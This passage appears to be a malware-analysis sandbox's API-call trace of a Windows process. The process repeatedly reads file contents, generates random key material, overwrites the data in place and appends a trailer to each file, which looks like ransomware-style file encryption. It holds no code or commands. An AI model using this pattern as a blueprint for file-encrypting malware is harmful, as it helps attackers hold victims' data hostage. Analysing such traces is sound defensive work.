[0077.489] GetProcessHeap () returned 0x4f10000 [0077.489] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.489] GetProcessHeap () returned 0x4f10000 [0077.489] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.489] GetProcessHeap () returned 0x4f10000 [0077.489] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.489] GetProcessHeap () returned 0x4f10000 [0077.489] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.489] GetProcessHeap () returned 0x4f10000 [0077.489] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.489] GetProcessHeap () returned 0x4f10000 [0077.489] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.489] GetProcessHeap () returned 0x4f10000 [0077.489] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.489] GetProcessHeap () returned 0x4f10000 [0077.489] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.489] GetProcessHeap () returned 0x4f10000 [0077.489] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.489] GetProcessHeap () returned 0x4f10000 [0077.489] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.489] GetProcessHeap () returned 0x4f10000 [0077.489] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.489] GetProcessHeap () returned 0x4f10000 [0077.490] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0077.490] GetProcessHeap () returned 0x4f10000 [0077.490] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.490] GetProcessHeap () returned 0x4f10000 [0077.490] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0077.490] GetProcessHeap () returned 0x4f10000 [0077.490] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0077.490] GetProcessHeap () returned 0x4f10000 [0077.490] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0077.490] GetProcessHeap () returned 0x4f10000 [0077.490] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d560a0 | out: hHeap=0x4f10000) returned 1 [0077.490] SetFilePointerEx (in: hFile=0x7d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.490] WriteFile (in: hFile=0x7d0, lpBuffer=0x7d7f878*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f878*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0077.490] WriteFile (in: hFile=0x7d0, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0077.490] GetProcessHeap () returned 0x4f10000 [0077.490] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0077.490] GetProcessHeap () returned 0x4f10000 [0077.490] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0077.490] GetProcessHeap () returned 0x4f10000 [0077.490] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0077.491] CloseHandle (hObject=0x7d0) returned 1 [0077.492] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 22 [0077.492] SetFilePointerEx (in: hFile=0x7d4, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.492] ReadFile (in: hFile=0x7d4, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0077.492] SetFilePointerEx (in: hFile=0x7d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.492] GetProcessHeap () returned 0x4f10000 [0077.492] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0077.492] GetProcessHeap () returned 0x4f10000 [0077.492] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56528 [0077.492] SystemFunction036 (in: RandomBuffer=0x7d56528, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56528) returned 1 [0077.493] GetProcessHeap () returned 0x4f10000 [0077.493] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0077.493] ReadFile (in: hFile=0x7d4, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x499, lpOverlapped=0x0) returned 1 [0077.509] SetFilePointerEx (in: hFile=0x7d4, liDistanceToMove=0xfffffb67, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.510] WriteFile (in: hFile=0x7d4, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x499, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x499, lpOverlapped=0x0) returned 1 [0077.510] GetProcessHeap () returned 0x4f10000 [0077.510] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0077.510] GetProcessHeap () returned 0x4f10000 [0077.510] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0077.510] GetProcessHeap () returned 0x4f10000 [0077.510] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d560a0 [0077.510] GetProcessHeap () returned 0x4f10000 [0077.510] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0077.510] GetProcessHeap () returned 0x4f10000 [0077.510] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56870 [0077.510] GetProcessHeap () returned 0x4f10000 [0077.510] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0077.510] GetProcessHeap () returned 0x4f10000 [0077.510] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.510] GetProcessHeap () returned 0x4f10000 [0077.510] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.510] GetProcessHeap () returned 0x4f10000 [0077.510] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.510] GetProcessHeap () returned 0x4f10000 [0077.510] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.510] GetProcessHeap () returned 0x4f10000 [0077.510] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.510] GetProcessHeap () returned 0x4f10000 [0077.510] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.510] GetProcessHeap () returned 0x4f10000 [0077.510] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.510] GetProcessHeap () returned 0x4f10000 [0077.510] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.510] GetProcessHeap () returned 0x4f10000 [0077.510] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.511] GetProcessHeap () returned 0x4f10000 [0077.511] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.511] GetProcessHeap () returned 0x4f10000 [0077.511] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.511] GetProcessHeap () returned 0x4f10000 [0077.511] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.511] GetProcessHeap () returned 0x4f10000 [0077.511] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.511] GetProcessHeap () returned 0x4f10000 [0077.511] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.511] GetProcessHeap () returned 0x4f10000 [0077.511] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.511] GetProcessHeap () returned 0x4f10000 [0077.511] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.511] GetProcessHeap () returned 0x4f10000 [0077.511] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.511] GetProcessHeap () returned 0x4f10000 [0077.511] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.511] GetProcessHeap () returned 0x4f10000 [0077.511] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.511] GetProcessHeap () returned 0x4f10000 [0077.511] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.511] GetProcessHeap () returned 0x4f10000 [0077.511] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.511] GetProcessHeap () returned 0x4f10000 [0077.511] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.511] GetProcessHeap () returned 0x4f10000 [0077.511] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.511] GetProcessHeap () returned 0x4f10000 [0077.511] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.511] GetProcessHeap () returned 0x4f10000 [0077.511] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.511] GetProcessHeap () returned 0x4f10000 [0077.511] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.511] GetProcessHeap () returned 0x4f10000 [0077.511] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.511] GetProcessHeap () returned 0x4f10000 [0077.511] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.512] GetProcessHeap () returned 0x4f10000 [0077.512] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.512] GetProcessHeap () returned 0x4f10000 [0077.512] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.512] GetProcessHeap () returned 0x4f10000 [0077.512] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.512] GetProcessHeap () returned 0x4f10000 [0077.512] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.512] GetProcessHeap () returned 0x4f10000 [0077.512] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0077.512] GetProcessHeap () returned 0x4f10000 [0077.512] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.512] GetProcessHeap () returned 0x4f10000 [0077.512] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0077.512] GetProcessHeap () returned 0x4f10000 [0077.512] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0077.512] GetProcessHeap () returned 0x4f10000 [0077.512] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0077.512] GetProcessHeap () returned 0x4f10000 [0077.512] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0077.512] GetProcessHeap () returned 0x4f10000 [0077.512] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0077.512] GetProcessHeap () returned 0x4f10000 [0077.512] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0077.512] GetProcessHeap () returned 0x4f10000 [0077.512] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x1f8) returned 0x7cf6bf8 [0077.512] GetProcessHeap () returned 0x4f10000 [0077.512] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0077.512] GetProcessHeap () returned 0x4f10000 [0077.512] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.512] GetProcessHeap () returned 0x4f10000 [0077.512] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0077.512] GetProcessHeap () returned 0x4f10000 [0077.512] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.512] GetProcessHeap () returned 0x4f10000 [0077.513] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.513] GetProcessHeap () returned 0x4f10000 [0077.513] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.513] GetProcessHeap () returned 0x4f10000 [0077.513] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.513] GetProcessHeap () returned 0x4f10000 [0077.513] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.513] GetProcessHeap () returned 0x4f10000 [0077.513] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.513] GetProcessHeap () returned 0x4f10000 [0077.513] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.513] GetProcessHeap () returned 0x4f10000 [0077.513] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.513] GetProcessHeap () returned 0x4f10000 [0077.513] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.513] GetProcessHeap () returned 0x4f10000 [0077.513] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.513] GetProcessHeap () returned 0x4f10000 [0077.513] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.513] GetProcessHeap () returned 0x4f10000 [0077.513] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.513] GetProcessHeap () returned 0x4f10000 [0077.513] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.513] GetProcessHeap () returned 0x4f10000 [0077.513] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.513] GetProcessHeap () returned 0x4f10000 [0077.513] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.513] GetProcessHeap () returned 0x4f10000 [0077.514] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.514] GetProcessHeap () returned 0x4f10000 [0077.514] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.514] GetProcessHeap () returned 0x4f10000 [0077.514] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.514] GetProcessHeap () returned 0x4f10000 [0077.514] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.514] GetProcessHeap () returned 0x4f10000 [0077.514] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.514] GetProcessHeap () returned 0x4f10000 [0077.514] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.514] GetProcessHeap () returned 0x4f10000 [0077.514] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.514] GetProcessHeap () returned 0x4f10000 [0077.514] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0077.514] GetProcessHeap () returned 0x4f10000 [0077.514] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.514] GetProcessHeap () returned 0x4f10000 [0077.514] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0077.514] GetProcessHeap () returned 0x4f10000 [0077.514] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0077.514] GetProcessHeap () returned 0x4f10000 [0077.514] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0077.514] GetProcessHeap () returned 0x4f10000 [0077.514] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d560a0 | out: hHeap=0x4f10000) returned 1 [0077.514] SetFilePointerEx (in: hFile=0x7d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.514] WriteFile (in: hFile=0x7d4, lpBuffer=0x7d7f878*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f878*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0077.514] WriteFile (in: hFile=0x7d4, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0077.515] GetProcessHeap () returned 0x4f10000 [0077.515] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0077.515] GetProcessHeap () returned 0x4f10000 [0077.515] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0077.515] GetProcessHeap () returned 0x4f10000 [0077.515] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0077.515] CloseHandle (hObject=0x7d4) returned 1 [0077.515] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 23 [0077.515] SetFilePointerEx (in: hFile=0x7d8, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.516] ReadFile (in: hFile=0x7d8, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0077.516] SetFilePointerEx (in: hFile=0x7d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.516] GetProcessHeap () returned 0x4f10000 [0077.516] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0077.516] GetProcessHeap () returned 0x4f10000 [0077.516] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56528 [0077.516] SystemFunction036 (in: RandomBuffer=0x7d56528, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56528) returned 1 [0077.516] GetProcessHeap () returned 0x4f10000 [0077.516] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0077.516] ReadFile (in: hFile=0x7d8, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x1000, lpOverlapped=0x0) returned 1 [0077.610] SetFilePointerEx (in: hFile=0x7d8, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.610] WriteFile (in: hFile=0x7d8, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x1000, lpOverlapped=0x0) returned 1 [0077.611] GetProcessHeap () returned 0x4f10000 [0077.611] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0077.611] GetProcessHeap () returned 0x4f10000 [0077.611] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0077.611] GetProcessHeap () returned 0x4f10000 [0077.611] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56870 [0077.611] GetProcessHeap () returned 0x4f10000 [0077.611] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0077.611] GetProcessHeap () returned 0x4f10000 [0077.611] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0077.611] GetProcessHeap () returned 0x4f10000 [0077.611] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0077.611] GetProcessHeap () returned 0x4f10000 [0077.611] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.611] GetProcessHeap () returned 0x4f10000 [0077.611] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.611] GetProcessHeap () returned 0x4f10000 [0077.611] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.611] GetProcessHeap () returned 0x4f10000 [0077.611] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.611] GetProcessHeap () returned 0x4f10000 [0077.611] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.611] GetProcessHeap () returned 0x4f10000 [0077.611] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.611] GetProcessHeap () returned 0x4f10000 [0077.611] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.611] GetProcessHeap () returned 0x4f10000 [0077.611] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.611] GetProcessHeap () returned 0x4f10000 [0077.611] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.611] GetProcessHeap () returned 0x4f10000 [0077.611] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.611] GetProcessHeap () returned 0x4f10000 [0077.611] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.611] GetProcessHeap () returned 0x4f10000 [0077.611] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.611] GetProcessHeap () returned 0x4f10000 [0077.612] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.612] GetProcessHeap () returned 0x4f10000 [0077.612] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.612] GetProcessHeap () returned 0x4f10000 [0077.612] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.612] GetProcessHeap () returned 0x4f10000 [0077.612] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.612] GetProcessHeap () returned 0x4f10000 [0077.612] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.612] GetProcessHeap () returned 0x4f10000 [0077.612] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.612] GetProcessHeap () returned 0x4f10000 [0077.612] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.612] GetProcessHeap () returned 0x4f10000 [0077.612] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.612] GetProcessHeap () returned 0x4f10000 [0077.612] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.612] GetProcessHeap () returned 0x4f10000 [0077.612] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.612] GetProcessHeap () returned 0x4f10000 [0077.612] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.612] GetProcessHeap () returned 0x4f10000 [0077.612] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.612] GetProcessHeap () returned 0x4f10000 [0077.612] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.612] GetProcessHeap () returned 0x4f10000 [0077.612] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.612] GetProcessHeap () returned 0x4f10000 [0077.612] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.612] GetProcessHeap () returned 0x4f10000 [0077.612] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.612] GetProcessHeap () returned 0x4f10000 [0077.612] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) 